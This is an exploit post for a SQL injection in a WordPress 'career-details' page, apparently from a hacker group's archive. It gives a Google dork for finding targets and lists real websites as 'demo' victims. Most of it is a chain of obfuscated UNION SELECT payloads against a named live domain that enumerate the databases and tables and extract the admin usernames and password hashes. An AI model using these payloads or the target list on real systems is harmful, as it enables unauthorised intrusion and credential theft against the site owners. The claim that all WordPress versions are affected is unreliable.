Wordpress All Version career details Sql Injection Vulnerability

[php]
Wordpress All Version career details Sql Injection Vulnerability

#######################################################
#
# [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
# [+] Google Dork: inurl:/career-details/?jobid=
# [+] Date: 10/10/2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Discovered By: Black.Hack3r
# [+] Version: All Version
# [+] Security Risk: High
# [+] Platforms: php
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] VULNERABILITY:
#
#Wordpress All Version career details Sql Injection Vulnerability
#
#######################################################
#
# [+] Exploit:
#
#http://localhost/[path]/career-details/?jobid=3'[Sql Injection]
#
#######################################################
#
# [+] Proof:
#
#http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
#http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
#
#######################################################
#
# [+] Demo site:
#
#http://www.sheensol.com/career-details?jobid=1
#http://www.stuxbot.co.uk/career-details/?jobid=3
#http://www.op3global.com/career-details/?jobid=3
#http://p2pdevs.com/career-details/?jobid=2
#http://37.58.83.234/~geerling/en/career-details/?jobid=1
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O
# [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,KurD_HaCK3R,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
# [+] Home : http://wWw.IDC-TeaM.NeT
#
#######################################################

http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4--
all databases :------------------------------------------------------------------------------------------------------------------------------------
http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/--
------------------------------------------------------------------------------------------------------------------------------------

currentdatabase
:--------------------------------------------------------------------------------------------------
http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ wp_users--
------------------------------------------------------------------------------------------------------------------------------------

tables for current database
:------------------------------------------------------------------------------------------
http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()--
---------------------------------------------------------------------------------------------------

columns in table wp_users
: ---------------------------------------------------------------------------------
http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(COLUMN_NAME)*/)),3,4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 95, 117, 115, 101, 114, 115)--
-----------------------------------------------------------------------------------------------------------

admin user & pass
: --------------------------------------------------------------------------------------------
http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),3,4 /*!12345from*/ wp_users--
-------------------------------------------------

Note: The exploit-- http://www.mondounix.com/wordpress-easy-career-openings-sql-injection/[/php]

发表评论